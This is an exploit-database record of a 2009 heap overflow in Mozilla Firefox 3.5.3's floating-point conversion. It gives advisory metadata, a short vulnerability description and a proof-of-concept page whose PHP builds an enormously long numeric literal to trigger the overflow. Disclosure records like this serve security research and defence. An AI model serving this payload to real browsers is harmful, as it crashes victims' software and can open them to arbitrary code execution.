Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow

2009-10-27T00:00:00
ID EXPLOITPACK:F3225F4E3FCBC6E05FE47B62AAC10B85
Type exploitpack
Reporter Alin Rad Pop
Modified 2009-10-27T00:00:00

Description

Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow

                                        
                                            source: https://www.securityfocus.com/bid/36851/info

Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability.

An attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.

NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).

NOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>